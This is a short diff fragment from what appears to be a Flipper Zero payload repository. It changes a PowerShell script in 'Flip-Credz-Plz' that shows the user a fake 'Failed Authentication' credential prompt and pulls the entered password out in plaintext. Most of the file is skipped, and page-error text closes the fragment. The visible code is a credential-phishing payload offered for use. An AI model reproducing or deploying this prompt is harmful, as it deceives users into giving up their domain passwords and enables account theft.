🤬
  • ■ ■ ■ ■
    Payloads/Flip-Credz-Plz/test.ps1
    skipped 54 lines
    55 55  {
    56 56   $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
    57 57   
    58  - if ($cred.Password -eq " ")
     58 + if ($cred.Password -eq $null)
    59 59   {
    60 60   Write-Output "Credentials cannot be left blank. Please try again."
    61 61   $form = $null
    skipped 158 lines
Please wait...
Page is in error, reload to recover